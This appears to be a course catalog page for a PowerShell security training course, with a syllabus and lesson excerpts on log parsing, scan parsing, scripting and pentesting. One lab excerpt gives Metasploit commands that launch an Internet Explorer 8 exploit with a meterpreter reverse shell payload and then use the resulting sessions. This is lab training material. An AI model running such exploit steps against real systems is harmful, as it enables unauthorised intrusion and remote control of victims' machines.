Powershell For InfoSec Professional

Or log in to access your purchased courses

PowerShell For InfoSec Professionals

The simple fact is if you are going to be attacking or defending modern environments with newer operating systems (Windows 10, Server 2016) – you need Powershell!

There is no getting around it, and the sooner you drink the Powershell Koolaid the better InfoSec Professional you will be.


  • Simple programming fundamentals
  • Cmdlets
  • Variables
  • WMI Objects

Security tasks with Powershell:

  • PowerShell Tool Development
  • PCAP Parsing and Sniffing
  • Malware Analysis

Pentesting tasks:

  • Ping Sweeping
  • Port Scanning
  • Enumerating Hosts/Networks
  • Download & Execute
  • Parsing Nmap scans
  • Parsing Nessus scan

Tool development:

  • Programming logic for security tasks
  • Tool structure
  • …..and of course, integrating with Metasploit, and other security tools
Course By

Joseph McCray


C1L1: Powershell Basics

Author: Joseph McCray

Introduction In this lesson, we will see and use some basic commands in the PowerShell console. We also have videos that will help you, and after this lesson is finished, you can use the PowerShell console to move from one folder to another, see what it contains and other things. Learning Objectives: Get to know [...]

C1L2: Simple Event Log Analysis

Author: Joseph McCray

Introduction: Event logs provide information about applications and can be modified including parameters using cdmlets characteristics that help to dump these events into specific variables or simply to identify specific dates within system registers. Learning Objectives: Describe Simple Event log analysis techniques Review Powershell scripts to manage event logs Analyze event log characteristics Step 1: Dump [...]

C1L3: Simple Log File Analysis

Author: Joseph McCray

Introduction The Log file analysis is an important task that allows us to get critical information about a service, an application or system. When we need to examine or when we need to research a target, it is highly recommended to dig into the logs files because, all the configurations, events, error warnings notices from a given [...]

C1L4: Parsing Log files using windows PowerShell

Author: Joseph McCray

PARSING LOG FILES Download the sample IIS log http://pastebin.com/LBn64cyA (new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=LBn64cyA", "c:\ps\u_ex1104.log") Get-Content ".\*log" | ? { ($_ | Select-String "WebDAV")} The above command would give us all the WebDAV requests. To filter this to a particular username, use the below command: Get-Content ".\*log" | ? { ($_ | Select-String "WebDAV") -and ($_ | Select-String "OPTIONS")} [...]

C1L7: Pentester Tasks

Author: Joseph McCray

Introduction. In this lesson, we will learn to ping with Powershell, and we will also perform a similar scan to Nmap, we will see several scripts to perform port scanning. Learning Objectives: Perform a scan in a local network Perform a port scan. Listing IPs One of the typical ways for working with IP addressed [...]

C1L8: Parsing Nmap XML Files

Author: Joseph McCray

PARSING NMAP XML FILES If you are NOT using the Win7 VM provided then you can get the required files for this lab which are located in this zip file: https://s3.amazonaws.com/infosecaddicts-files/PowerShell-Files.zip Run Powershell as administrator cd C:\ Get-ExecutionPolicy Set-ExecutionPolicy Unrestricted –Force Parse nmap XML .\parse-nmap.ps1 samplescan.xml Process all XML files .\parse-nmap.ps1 *.xml Piping also works [...]

C1L9: Parsing Nessus scans with PowerShell

Author: Joseph McCray

Introduction Nessus allows the scanning of vulnerabilities of different types of systems, the report of this action can be obtained in different formats, being csv the most used we will see how some PowerShell cmdlet allow us to parse a CSV file, to obtain specific details, customize formats and more. In the next lesson, we will see [...]

C1L11: Introduction to scripting and toolmaking

Author: Joseph McCray

Start the ISE CTRL+R Get-EventLog -LogName application   Now run the script .\GrabLogs.ps1   $LogName="application" Get-EventLog -LogName $LogName | Export-Clixml C:\Users\Workshop\Desktop\Scripts\$LogName.xml Now run the script .\GrabLogs.ps1 param( $LogName="application" ) Get-EventLog -LogName $LogName | Export-Clixml C:\Users\Workshop\Desktop\Scripts\$LogName.xml --- Now run the script --- .\GrabLogs.ps1   Now run the script .\GrabLogs.ps1 -L[ TAB Key ] .\GrabLogs.ps1 -LogName (you [...]

C1L12: Attacking Windows 7

Author: Joseph McCray

ATTACKING WINDOWS 7 NOTE: You'll be using your Ubuntu Linux host as the attacker machine in this lab sudo /sbin/iptables -F infosecaddicts cd ~/toolz/metasploit ./msfconsole use exploit/windows/browser/ie_cgenericelement_uaf set ExitOnSession false set URIPATH /ie8 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST InfoSecAddictsVM exploit -j Now from the Win7 host, use Internet Explorer 8 to connect to the exploit [...]

C1L13: Client-Side Enumeration

Author: Joseph McCray

CLIENT SIDE ENUMERATION You can list the active sessions by typing: sessions -l You can "interact" with any active session by typing sessions -i 3 (replace 3 with the session number you want to interact with) sessions -i 1 You should now see Metasploit's meterpreter prompt. Figure out who and where you are meterpreter> sysinfo [...]

C1L14: Running Powershell From A Command Prompt

Author: Joseph McCray

Using Powersploit & Nishang The following lesson will show how we can use powershell command from the command prompt in Windows, COMMAND & 1 PARAMETER SYNTAX: powershell -command "& {&'some-command' someParam}" MULTIPLE COMMAND & PARAMETER SYNTAX powershell -command "& {&'some-command' someParam}"; "& {&'some-command' -SpecificArg someParam}" Simple Ping Sweep powershell -command "100..150 | % {\""192.168.0.$($_): $(Test-Connection [...]